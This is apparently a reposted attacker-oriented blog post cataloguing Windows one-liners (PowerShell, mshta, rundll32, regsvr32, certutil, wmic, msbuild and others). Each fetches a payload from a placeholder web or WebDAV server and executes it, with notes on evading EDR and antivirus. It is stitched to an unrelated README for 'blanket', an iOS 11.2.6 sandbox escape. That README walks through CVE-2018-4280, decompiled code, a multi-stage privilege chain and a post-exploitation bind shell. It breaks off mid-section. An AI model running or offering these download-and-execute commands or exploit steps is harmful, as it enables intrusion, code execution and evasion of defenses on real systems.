Windows oneliners to download remote payload and execute arbitrary code

( origin text )

In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an attacker could use besides the famous powershell oneliner » ?

These command lines need to fulfill the following prerequisites:

  • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh ?
  • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it ?
  • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ?
  • make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as much systems as possible
  • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ?
  • work in memory only – because your final payload might get caught by AV when written on disk

A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want: execute arbitrary code abusing Microsoft built-in binaries.

Let’s be clear that not all command lines will fulfill all of the above points. Especially the « do not write the payload on disk » one, because most of the time the downloaded file will end-up in a local cache.

When it comes to downloading a payload from a remote server, it basically boils down to 3 options:

  1. either the command itself accepts an HTTP URL as one of its arguments
  2. the command accepts a UNC path (pointing to a WebDAV server)
  3. the command can execute a small inline script with a download cradle

Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one the following location:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>

On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. In case it’s not started, in order to start it even from a low privileged user, simply prepend your command line with « pushd \\webdavserver & popd ».

In all of the following scenarios, I’ll mention which process is seen as performing the network traffic and where the payload is written on disk.

Powershell


Ok, this is by far the most famous one, but also probably the most monitored oneif not blocked. A well known proxy friendly command line is the following:

1
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO (at least nowhere I could find using procmon !)

Of course you could also use its encoded counterpart.

But you can also call the payload directly from a WebDAV server:

1
powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cmd


Why make things complicated when you can have cmd.exe executing a batch file ? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything that you can think of !). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior work), and see that you can easily drop any binary, dll, script: https://github.com/Arno0x/PowerShellScripts
So once you’ve been creative with your payload as a batch file, go for it:

1
cmd.exe /k < \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cscript/Wscript


Also very common, but the idea here is to download the payload from a remote server in one command line:

1
cscript //E:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Mshta


Mshta really is the same family as cscript/wscript but with the added capability of executing an inline script which will download and execute a scriptlet as a payload:

1
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe
Payload written on disk: IE local cache

You could also do a much simpler trick since mshta accepts a URL as an argument to execute an HTA file:

1
mshta http://webserver/payload.hta

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Eventually, the following also works, with the advantage of hiding mshta.exe downloading stuff:

1
mshta \\webdavserver\folder\payload.hta

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32


A well known one as well, can be used in different ways. First one is referring to a standard DLL using a UNC path:

1
rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32 can also be used to call some inline jscript:

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Process performing network call: rundll32.exe
Payload written on disk: IE local cache

Wmic


Discovered by @subTee with @mattifestation, wmic can invoke an XSL (eXtensible Stylesheet Language) local or remote file, which may contain some scripting of our choice:

1
wmic os get /format:"https://webserver/payload.xsl"

Process performing network call: wmic.exe
Payload written on disk: IE local cache

Regasm/Regsvc


Regasm and Regsvc are one of those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV:

1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regsvr32


Another one from @subTee. This ones requires a slightly different scriptlet from the mshta one above. First option:

1
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Second option using UNC/WebDAV:

1
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Odbcconf


This one is close to the regsvr32 one. Also discovered by @subTee, it can execute a DLL exposing a specific function. To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

1
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Msbuild


Let’s keep going with all these .Net framework utilities discovered by @subTee. You can NOT use msbuild.exe using an inline tasks straight from a UNC path (actually, you can but it gets really messy), so I turned out with the following trick, using msbuild.exe only. Note that it will require to be called within a shell with ENABLEDELAYEDEXPANSION (/V option):

1
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Not sure this one is really useful as is. As we’ll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe.

Combining some commands


After all, having the possibility to execute a command line (from DDE for instance) doesn’t mean you should restrict yourself to only one command. Commands can be chained to reach an objective.

For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this:

1
certutil -urlcache -split -f http://webserver/payload payload

Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload:

1
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

You could simply deliver an executable:

1
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

There are probably much other ways of achieving the same result, but these command lines do the job while fulfilling most of prerequisites we set at the beginning of this post !

One may wonder why I do not mention the usage of the bitsadmin utility as a means of downloading a payload. I’ve left this one aside on purpose simply because it’s not proxy aware.

Payloads source examples


All the command lines previously cited make use of specific payloads:

  • Various scriplets (.sct), for mshta, rundll32 or regsvr32
  • XSL files for wmic
  • HTML Application (.hta)
  • MSBuild inline tasks (.xml or .csproj)
  • DLL for InstallUtil or Regasm/Regsvc

You can get examples of most payloads from the awesome atomic-red-team repo on Github: https://github.com/redcanaryco/atomic-red-team from @redcanaryco.

You can also get all these payloads automatically generated thanks to the GreatSCT project on Github: https://github.com/GreatSCT/GreatSCT

You can also find some other examples on my gist: https://gist.github.com/Arno0x

Реклама

Blanket is a sandbox escape targeting iOS 11.2.6

blanket

https://github.com/bazad/blanket

Blanket is a sandbox escape targeting iOS 11.2.6, although the main vulnerability was only patched in iOS 11.4.1. It exploits a Mach port replacement vulnerability in launchd (CVE-2018-4280), as well as several smaller vulnerabilities in other services, to execute code inside the ReportCrash process, which is unsandboxed, runs as root, and has the task_for_pid-allowentitlement. This grants blanket control over every process running on the phone, including security-critical ones like amfid.

The exploit consists of several stages. This README will explain the main vulnerability and the stages of the sandbox escape step-by-step.

Impersonating system services

While researching crash reporting on iOS, I discovered a Mach port replacement vulnerability in launchd. By crashing in a particular way, a process can make the kernel send a Mach message to launchd that causes launchd to over-deallocate a send right to a Mach port in its IPC namespace. This allows an attacker to impersonate any launchd service it can look up to the rest of the system, which opens up numerous avenues to privilege escalation.

This vulnerability is also present on macOS, but triggering the vulnerability on iOS is more difficult due to checks in launchd that ensure that the Mach exception message comes from the kernel.

CVE-2018-4280: launchd Mach port over-deallocation while handling EXC_CRASH exception messages

Launchd multiplexes multiple different Mach message handlers over its main port, including a MIG handler for exception messages. If a process sends a mach_exception_raise or mach_exception_raise_state_identity message to its own bootstrap port, launchd will receive and process that message as a host-level exception.

Unfortunately, launchd’s handling of these messages is buggy. If the exception type is EXC_CRASH, then launchd will deallocate the thread and task ports sent in the message and then return KERN_FAILURE from the service routine, causing the MIG system to deallocate the thread and task ports again. (The assumption is that if a service routine returns success, then it has taken ownership of all resources in the Mach message, while if the service routine returns an error, then it has taken ownership of none of the resources.)

Here is the code from launchd’s service routine for mach_exception_raise messages, decompiled using IDA/Hex-Rays and lightly edited for readability:

kern_return_t __fastcall
catch_mach_exception_raise(                             // (a) The service routine is
        mach_port_t            exception_port,          //     called with values directly
        mach_port_t            thread,                  //     from the Mach message
        mach_port_t            task,                    //     sent by the client. The
        exception_type_t       exception,               //     thread and task ports could
        mach_exception_data_t  code,                    //     be arbitrary send rights.
        mach_msg_type_number_t codeCnt)
{
    __int64 __stack_guard;                 // ST28_8@1
    kern_return_t kr;                      // w0@1 MAPDST
    kern_return_t result;                  // w0@4
    __int64 codes_left;                    // x25@6
    mach_exception_data_type_t code_value; // t1@7
    int pid;                               // [xsp+34h] [xbp-44Ch]@1
    char codes_str[1024];                  // [xsp+38h] [xbp-448h]@7

    __stack_guard = *__stack_chk_guard_ptr;
    pid = -1;
    kr = pid_for_task(task, &pid);
    if ( kr )
    {
        _os_assumes_log(kr);
        _os_avoid_tail_call();
    }
    if ( current_audit_token.val[5] )                   // (b) If the message was sent by
    {                                                   //     a process with a nonzero PID
        result = KERN_FAILURE;                          //     (any non-kernel process),
    }                                                   //     the message is rejected.
    else
    {
        if ( codeCnt )
        {
            codes_left = codeCnt;
            do
            {
                code_value = *code;
                ++code;
                __snprintf_chk(codes_str, 0x400uLL, 0, 0x400uLL, "0x%llx", code_value);
                --codes_left;
            }
            while ( codes_left );
        }
        launchd_log_2(
            0LL,
            3LL,
            "Host-level exception raised: pid = %d, thread = 0x%x, "
                "exception type = 0x%x, codes = { %s }",
            pid,
            thread,
            exception,
            codes_str);
        kr = deallocate_port(thread);                   // (c) The "thread" port sent in
        if ( kr )                                       //     the message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        kr = deallocate_port(task);                     // (d) The "task" port sent in the
        if ( kr )                                       //     message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        if ( exception == EXC_CRASH )                   // (e) If the exception type is
            result = KERN_FAILURE;                      //     EXC_CRASH, then KERN_FAILURE
        else                                            //     is returned. MIG will
            result = 0;                                 //     deallocate the ports again.
    }
    *__stack_chk_guard_ptr;
    return result;
}

This is what the code does:

  1. This function is the Mach service routine for mach_exception_raise exception messages: it gets invoked directly by the Mach system when launchd processes a mach_exception_raise Mach exception message. The arguments to the service routine are parsed from the Mach message, and hence are controlled by the message’s sender.
  2. At (b), launchd checks that the Mach exception message was sent by the kernel. The sender’s audit token contains the PID of the sending process in field 5, which will only be zero for the kernel. If the message wasn’t sent by the kernel, it is rejected.
  3. The thread and task ports from the message are explicitly deallocated at (c) and (d).
  4. At (e), launchd checks whether the exception type is EXC_CRASH, and returns KERN_FAILURE if so. The intent is to make sure not to handle EXC_CRASH messages, presumably so that ReportCrash is invoked as the corpse handler. However, returning KERN_FAILURE at this point will cause the task and thread ports to be deallocated again when the exception message is cleaned up later. This means those two ports will be over-deallocated.

In order for this vulnerability to be useful, we will want to free launchd’s send right to a Mach service it vends, so that we can then impersonate that service to the rest of the system. This means that we’ll need the task and thread ports in the exception message to really be send rights to the Mach service port we want to free in launchd. Then, once we’ve sent launchd the malicious exception message and freed the service port, we will try to get that same port name reused, but this time for a Mach port to which we hold the receive right. That way, when a client asks launchd to give them a send right to the Mach port for the service, launchd will instead give them a send right to our port, letting us impersonate that service to the client. After that, there are many different routes to gain system privileges.

Triggering the vulnerability

In order to actually trigger the vulnerability, we’ll need to bypass the check that the message was sent by the kernel. This is because if we send the exception message to launchd directly it will just be discarded. Somehow, we need to get the kernel to send a «malicious» exception message containing a Mach send right for a system service instead of the real thread and task ports.

As it turns out, there is a Mach trap, task_set_special_port, that can be used to set a custom send right to be used in place of the true task port in certain situations. One of these situations is when the kernel generates an exception message on behalf of a task: instead of placing the true task send right in the exception message, the kernel will use the send right supplied bytask_set_special_port. More specifically, if a task calls task_set_special_port to set a custom value for its TASK_KERNEL_PORTspecial port and then the task crashes, the exception message generated by the kernel will have a send right to the custom port, not the true task port, in the «task» field. An equivalent API, thread_set_special_port, can be used to set a custom port in the «thread» field of the generated exception message.

Because of this behavior, it’s actually not difficult at all to make the kernel generate a «malicious» exception message containing a Mach service port in place of the task and thread port. However, we still need to ensure that the exception message that we generate gets delivered to launchd.

Once again, making sure the kernel delivers the «malicious» exception message to launchd isn’t difficult if you know the right API. The function thread_set_exception_ports will set any Mach send right as the port to which exception messages on this thread are delivered. Thus, all we need to do is invoke thread_set_exception_ports with the bootstrap port, and then any exception we generate will cause the kernel to send an exception message to launchd.

The last piece of the puzzle is getting the right exception type. The vulnerability will only be triggered for EXC_CRASHexceptions. A little trial and error reveals that we can easily generate EXC_CRASH exceptions by calling the standard abortfunction.

Thus, in summary, we can use existing and well-documented APIs to make the kernel generate a malicious EXC_CRASHexception message on our behalf and deliver it to launchd, triggering the vulnerability and freeing the Mach service port:

  1. Use thread_set_exception_ports to set launchd as the exception handler for this thread.
  2. Call bootstrap_look_up to get the service port for the service we want to impersonate from launchd.
  3. Call task_set_special_port/thread_set_special_port to use that service port instead of the true task and thread ports in exception messages.
  4. Call abort. The kernel will send an EXC_CRASH exception message to launchd, but the task and thread ports in the message will be the target service port.
  5. Launchd will process the exception message and free the service port.

Running code after the crash

There’s a problem with the above strategy: calling abort will kill our process. If we want to be able to run any code at all after triggering the vulnerability, we need a way to perform the crash in another process.

(With other exception types a process could actually recover from the exception. The way a process would recover is to set its thread exception handler to be launchd and its task exception handler to be itself. After launchd processes and fails to handle the exception, the kernel would send the exception to the task handler, which would reset the thread state and inform the kernel that the exception has been handled. However, a process cannot catch its own EXC_CRASH exceptions, so we do need two processes.)

One strategy is to first exploit a vulnerability in another process on iOS and force that process to set its kernel ports and crash. However, for a proof-of-concept, it’s easier to create an app extension.

App extensions, introduced in iOS 8, provide a way to package some functionality of an application so it is available outside of the application. The code of an app extension runs in a separate, sandboxed process. This makes it very easy to launch a process that will set its special ports, register launchd as its exception handler for EXC_CRASH, and then call abort.

There is no supported way for an app to programatically launch its own app extension and talk to it. However, Ian McDowell wrote a great article describing how to use the private NSExtension API to launch and communicate with an app extension process. I’ve used an almost identical strategy here. The only difference is that we need to communicate a Mach port to the app extension process, which involves registering a dummy service with launchd to which the app extension connects.

Preventing port reuse in launchd

One challenge you would notice if you ran the exploit as described is that occasionally you would not be able to reacquire the freed port. The reason for this is that the kernel tracks a process’s free IPC entries in a freelist, and so a just-freed port name will be reused (with a different generation number) when a new port is allocated in the IPC table. Thus, we will only reallocate the port name we want if launchd doesn’t reuse that IPC entry slot for another port first.

The way around this is to bury the free IPC entry slot down the freelist, so that if launchd allocates new ports those other slots will be used first. How do we do this? We can register a bunch of dummy Mach services in launchd with ports to which we hold the receive right. When we call abort, the exception handler will fire first, and then the process state, including the Mach ports, will be cleaned up. When launchd receives the EXC_CRASH exception it will inadvertently free the target service port, placing the IPC entry slot corresponding to that port name at the head of the freelist. Then, when the rest of our app extension’s Mach ports are destroyed, launchd will receive notifications and free the dummy service ports, burying the target IPC entry slot behind the slots for the just-freed ports. Thus, as long as launchd allocates fewer ports than the number of dummy services we registered, the target slot will still be on the freelist, meaning we can still cause launchd to reallocate the slot with the same port name as the original service.

The limitation of this strategy is that we need the com.apple.security.application-groups entitlement in order to register services with launchd. There are other ways to stash Mach ports in launchd, but using application groups is certainly the easiest, and suffices for this proof-of-concept.

Impersonating the freed service

Once we have spawned the crasher app extension and freed a Mach send right in launchd, we need to reallocate that Mach port name with a send right to which we hold the receive right. That way, any messages launchd sends to that port name will be received by us, and any time launchd shares that port name with a client, the client will receive a send right to our port. In particular, if we can free launchd’s send right to a Mach service, then any process that requests that service from launchd will receive a send right to our own port instead of the real service port. This allows us to impersonate the service or perform a man-in-the-middle attack, inspecting all messages that the client sends to the service.

Getting the freed port name reused so that it refers to a port we own is also quite simple, given that we’ve already decided to use the application-groups entitlement: just register dummy Mach services with launchd until one of them reuses the original port name. We’ll need to do it in batches, registering a large number of dummy services together, checking to see if any has successfully reused the freed port name, and then deregistering them. The reason is that we need to be sure that our registrations go all the way back in the IPC port freelist to recover the buried port name we want.

We can check whether we’ve managed to successfully reuse the freed port name by looking up the original service with bootstrap_look_up: if it returns one of our registered service ports, we’re done.

Once we’ve managed to register a new service that gets the same port name as the original, any clients that look up the original service in launchd will be given a send right to our port, not the real service port. Thus, we are effectively impersonating the original service to the rest of the system (or at least, to those processes that look up the service after our attack).

Stage 1: Obtaining the host-priv port

Once we have the capability to impersonate arbitrary system services, the next step is to obtain the host-priv port. This step is straightforward, and is not affected by the changes in iOS 11.3. The high-level idea of this attack is to impersonate SafetyNet, crash ReportCrash, and then retrieve the host-priv port from the dying ReportCrash task port sent in the exception message.

About ReportCrash and SafetyNet

ReportCrash is responsible for generating crash reports on iOS. This one binary actually vends 4 different services (each in a different process, although not all may be running at any given time):

  1. com.apple.ReportCrash is responsible for generating crash reports for crashing processes. It is the host-level exception handler for EXC_CRASHEXC_GUARD, and EXC_RESOURCE exceptions.
  2. com.apple.ReportCrash.Jetsam handles Jetsam reports.
  3. com.apple.ReportCrash.SimulateCrash creates reports for simulated crashes.
  4. com.apple.ReportCrash.SafetyNet is the registered exception handler for the com.apple.ReportCrash service.

The ones of interest to us are com.apple.ReportCrash and com.apple.ReportCrash.SafetyNet, hereafter referred to simply as ReportCrash and SafetyNet. Both of these are MIG-based services, and they run effectively the same code.

When ReportCrash starts up, it looks up the SafetyNet service in launchd and sets the returned port as the task-level exception handler. The intent seems to be that if ReportCrash itself were to crash, a separate process would generate the crash report for it. However, this code path looks defunct: ReportCrash registers SafetyNet for mach_exception_raise messages, even though both ReportCrash and SafetyNet only handle mach_exception_raise_state_identity messages. Nonetheless, both services are still present and reachable from within the iOS container sandbox.

ReportCrash manipulation primitives

In order to carry out the following attack, we need to be able to manipulate ReportCrash (or SafetyNet) to behave in the way we want. Specifically, we need the following capabilities: start ReportCrash on demand, force ReportCrash to exit, crash ReportCrash, and make sure that ReportCrash doesn’t exit while we’re using it. Here I’ll describe how we achieve each objective.

In order to start ReportCrash, we simply need to send it a Mach message: launchd will start it on demand. However, due to its peculiar design, any message type except mach_exception_raise_state_identity will cause ReportCrash to stop responding to new messages and eventually exit. Thus, we need to send a mach_exception_raise_state_identity message if we want it to stay alive afterwards.

In order to exit ReportCrash, we can simply send it any other type of Mach message.

There are many ways to crash ReportCrash. The easiest is probably to send a mach_exception_raise_state_identity message with the thread port set to MACH_PORT_NULL.

Finally, we need to ensure that ReportCrash does not exit while we’re using it. Each mach_exception_raise_state_identitymessage that it processes causes it to spin off another thread to listen for the next message while the original thread generates the crash report. ReportCrash will exit once all of the outstanding threads generating a crash report have finished. Thus, if we can stall one of those threads while it is in the process of generating a crash report, we can keep it from ever exiting.

The easiest way I found to do that was to send a mach_exception_raise_state_identity message with a custom port in the task and thread fields. Once ReportCrash tries to generate a crash report, it will call task_policy_get on the «task» port, which will cause it to send a Mach message to the port that we sent and await a reply. But since the «task» port is just a regular old Mach port, we can simply not reply to the Mach message, and ReportCrash will wait indefinitely for task_policy_get to return.

Extracting host-priv from ReportCrash

For the first stage of the exploit, the attack plan is relatively straightforward:

  1. Start the SafetyNet service and force it to stay alive for the duration of our attack.
  2. Use the launchd service impersonation primitive to impersonate SafetyNet. This gives us a new port on which we can receive messages intended for the real SafetyNet service.
  3. Make any existing instance of ReportCrash exit. That way, we can ensure that ReportCrash looks up our SafetyNet port in the next step.
  4. Start ReportCrash. ReportCrash will look up SafetyNet in launchd and set the resulting port, which is the fake SafetyNet port for which we own the receive right, as the destination for EXC_CRASH messages.
  5. Trigger a crash in ReportCrash. After seeing that there are no registered handlers for the original exception type, ReportCrash will enter the process death phase. At this point XNU will see that ReportCrash registered the fake SafetyNet port to receive EXC_CRASH exceptions, so it will generate an exception message and send it to that port.
  6. We then listen on the fake SafetyNet port for the EXC_CRASH message. It will be of type mach_exception_raise, which means it will contain ReportCrash’s task port.
  7. Finally, we use task_get_special_port on the ReportCrash task port to get ReportCrash’s host port. Since ReportCrash is unsandboxed and runs as root, this is the host-priv port.

At the end of this stage of the sandbox escape, we end up with a usable host-priv port. This alone demonstrates that this is a serious security issue.

Stage 2: Escaping the sandbox

Even though we have the host-priv port, our goal is to fully escape the sandbox and run code as root with the task_for_pid-allow entitlement. The first step in achieving that is to simply escape the sandbox.

Technically speaking there’s no reason we need to obtain the host-priv port before escaping the sandbox: these two steps are independent and can occur in either order. However, this stage will leave the system unstable if it or subsequent stages fail, so it’s worth putting later.

The high-level attack is to use the same launchd vulnerability again to impersonate a system service. However, this time our goal is to impersonate a service to which a client will send its task port in a Mach message. It’s easy to find by experimentation on iOS 11.2.6 that if we impersonate com.apple.CARenderServer (hereafter CARenderServer) hosted by backboardd and then communicate with com.apple.DragUI.druid.source, the unsandboxed druid daemon will send its task port in a Mach message to the fake service port.

This step of the exploit is broken on iOS 11.3 because druid no longer sends its task port in the Mach message to CARenderServer. Despite this, I’m confident that this vulnerability can still be used to escape the sandbox. One way to go about this is to look for unsandboxed services that trust input from other services. These types of «vulnerabilities» would never be exploitable without the capability to replace system services, which means they are probably a low-priority attack surface, both internally and externally to Apple.

Crashing druid

Just like with ReportCrash, we need to be able to force druid to restart in case it is already running so that it looks up our fake CARenderServer port in launchd. I decided to use a bug in libxpc that was already scheduled to be fixed for this purpose.

While looking through libxpc, I found an out-of-bounds read that could be used to force any XPC service to crash:

void _xpc_dictionary_apply_wire_f
(
        OS_xpc_dictionary *xdict,
        OS_xpc_serializer *xserializer,
        const void *context,
        bool (*applier_fn)(const char *, OS_xpc_serializer *, const void *)
)
{
...
    uint64_t count = (unsigned int)*serialized_dict_count;
    if ( count )
    {
        uint64_t depth = xserializer->depth;
        uint64_t index = 0;
        do
        {
            const char *key = _xpc_serializer_read(xserializer, 0, 0, 0);
            size_t keylen = strlen(key);
            _xpc_serializer_advance(xserializer, keylen + 1);
            if ( !applier_fn(key, xserializer, context) )
                break;
            xserializer->depth = depth;
            ++index;
        }
        while ( index < count );
    }
...
}

The problem is that the use of an unchecked strlen on attacker-controlled data allows the key for the serialized dictionary entry to extend beyond the end of the data buffer. This means the XPC service deserializing the dictionary will crash, either when strlen dereferences out-of-bounds memory or when _xpc_serializer_advance tries to advance the serializer past the end of the supplied data.

This bug was already fixed in iOS 11.3 Beta by the time I discovered it, so I did not report it to Apple. The exploit is available as an independent project in my xpc-crash repository.

In order to use this bug to crash druid, we simply need to send the druid service a malformed XPC message such that the dictionary’s key is unterminated and extends to the last byte of the message.

Obtaining druid’s task port

Obtaining druid’s task port on iOS 11.2.6 using our service impersonation primitive is easy:

  1. Use the Mach service impersonation capability to impersonate CARenderServer.
  2. Send a message to the druid service so that it starts up.
  3. If we don’t get druid’s task port after a few seconds, kill druid using the XPC bug and restart it.
  4. Druid will send us its task port on the fake CARenderServer port.

Getting around the platform binary task port restrictions

Once we have druid’s task port, we still need to figure out how to execute code inside the druid process.

The problem is that XNU protects task ports for platform binaries from being modified by non-platform binaries. The defense is implemented in the function task_conversion_eval, which is called by convert_port_to_locked_task and convert_port_to_task_with_exec_token:

kern_return_t
task_conversion_eval(task_t caller, task_t victim)
{
	/*
	 * Tasks are allowed to resolve their own task ports, and the kernel is
	 * allowed to resolve anyone's task port.
	 */
	if (caller == kernel_task) {
		return KERN_SUCCESS;
	}

	if (caller == victim) {
		return KERN_SUCCESS;
	}

	/*
	 * Only the kernel can can resolve the kernel's task port. We've established
	 * by this point that the caller is not kernel_task.
	 */
	if (victim == kernel_task) {
		return KERN_INVALID_SECURITY;
	}

#if CONFIG_EMBEDDED
	/*
	 * On embedded platforms, only a platform binary can resolve the task port
	 * of another platform binary.
	 */
	if ((victim->t_flags & TF_PLATFORM) && !(caller->t_flags & TF_PLATFORM)) {
#if SECURE_KERNEL
		return KERN_INVALID_SECURITY;
#else
		if (cs_relax_platform_task_ports) {
			return KERN_SUCCESS;
		} else {
			return KERN_INVALID_SECURITY;
		}
#endif /* SECURE_KERNEL */
	}
#endif /* CONFIG_EMBEDDED */

	return KERN_SUCCESS;
}

MIG conversion routines that rely on these functions, including convert_port_to_task and convert_port_to_map, will thus fail when we call them on druid’s task. For example, mach_vm_write won’t allow us to manipulate druid’s memory.

However, while looking at the MIG file osfmk/mach/task.defs in XNU, I noticed something interesting:

/*
 *	Returns the set of threads belonging to the target task.
 */
routine task_threads(
		target_task	: task_inspect_t;
	out	act_list	: thread_act_array_t);

The function task_threads, which enumerates the threads in a task, actually takes a task_inspect_t rather than a task_t, which means MIG converts it using convert_port_to_task_inspect rather than convert_port_to_task. A quick look atconvert_port_to_task_inspect reveals that this function does not perform the task_conversion_eval check, meaning we can call it successfully on platform binaries. This is interesting because the returned threads are not thread_inspect_t rights, but rather full thread_act_t rights. Put another way, task_threads promotes a non-modifiable task right into modifiable thread rights. And since there’s no equivalent thread_conversion_eval, this means we can use the Mach thread APIs to modify the threads in a task even if that task is a platform binary.

In order to take advantage of this, I wrote a library called threadexec which builds a full-featured function call capability on top of the Mach threads API. The threadexec project in and of itself was a significant undertaking, but as it is only indirectly relevant to this exploit, I will forego a detailed explanation of its inner workings.

Stage 3: Installing a new host-level exception handler

Once we have the host-priv port and unsandboxed code execution inside of druid, the next stage of the full sandbox escape is to install a new host-level exception handler. This process is straightforward given our current capabilities:

  1. Get the current host-level exception handler for EXC_BAD_ACCESS by calling host_get_exception_ports.
  2. Allocate a Mach port that will be the new host-level exception handler for EXC_BAD_ACCESS.
  3. Send the host-priv port and a send right to the Mach port we just allocated over to druid.
  4. Using our execution context in druid, make druid call host_set_exception_ports to register our Mach port as the host-level exception handler for EXC_BAD_ACCESS.

After this stage, any time a process accesses an invalid memory address (and also does not have a registered exception handler), an EXC_BAD_ACCESS exception message will be sent to our new exception handler port. This will give us the task port of any crashing process, and since EXC_BAD_ACCESS is a recoverable exception, this time we can use the task port to execute code.

Stage 4: Getting ReportCrash’s task port

The next stage is to trigger an EXC_BAD_ACCESS exception in ReportCrash so that its task port gets sent in an exception message to our new exception handler port:

  1. Crash ReportCrash using the previously described technique. This will cause ReportCrash to generate an EXC_BAD_ACCESSexception. Since ReportCrash has no exception handler registered for EXC_BAD_ACCESS (remember SafetyNet is registered for EXC_CRASH), the exception will be delivered to the host-level exception handler.
  2. Listen for exception messages on our host exception handler port.
  3. When we receive the exception message for ReportCrash, save the task and thread ports. Suspend the crashing thread and return KERN_SUCCESS to indicate to the kernel that the exception has been handled and ReportCrash can be resumed.
  4. Use the task and thread ports to establish an execution context inside ReportCrash just like we did with druid.

At this point, we have code execution inside an unsandboxed, root, task_for_pid-allow process.

Stage 5: Restoring the original host-level exception handler

The next two stages aren’t strictly necessary but should be performed anyway.

Once we have code execution inside ReportCrash, we should reset the host-level exception handler for EXC_BAD_ACCESS using druid:

  1. Send the old host-level exception handler port over to druid.
  2. Call host_set_exception_ports in druid to re-register the old host-level exception handler for EXC_BAD_ACCESS.

This will stop our exception handler port from receiving exception messages for other crashing processes.

Stage 6: Fixing up launchd

The last step is to restore the damage we did to launchd when we freed service ports in its IPC namespace in order to impersonate them:

  1. Call task_for_pid in ReportCrash to get launchd’s task port.
  2. For each service we impersonated:
    1. Get launchd’s name for the send right to the fake service port. This is the original name of the real service port.
    2. Destroy the fake service port, deregistering the fake service with launchd.
    3. Call mach_port_insert_right in ReportCrash to push the real service port into launchd’s IPC space under the original name.

After this step is done, the system should once again be fully functional. After successful exploitation, there should be no need to force reset the device, since the exploit repairs all the damages itself.

Post-exploitation

Blanket also packages a post-exploitation payload that bypasses amfid and spawns a bind shell. This section will describe how that is achieved.

Spawning a payload process

Even after gaining code execution in ReportCrash, using that capability is not easy: we are limited to performing individual function calls from within the process, which makes it painful to perform complex tasks. Ideally, we’d like a way to run code natively with ReportCrash’s privileges, either by injecting code into ReportCrash or by spawning a new process with the same (or higher) privileges.

Blanket chooses the process spawning route. We use task_for_pid and our platform binary status in ReportCrash to get launchd’s task port and create a new thread inside of launchd that we can control. We then use that thread to call posix_spawnto launch our payload binary. The payload binary can be signed with restricted entitlements, including task_for_pid-allow, to grant additional capabilities.

Bypassing amfid

In order for iOS to accept our newly spawned binary, we need to bypass codesigning. Various strategies have been discussed over the years, but the most common current strategy is to register an exception handler for amfid and then perform a data patch so that amfid crashes when trying to call MISValidateSignatureAndCopyInfo. This allows us to fake the implementation of that function to pretend that the code signature is valid.

However, there’s another approach which I believe is more robust and flexible: rather than patching amfid at all, we can simply register a new amfid port in the kernel.

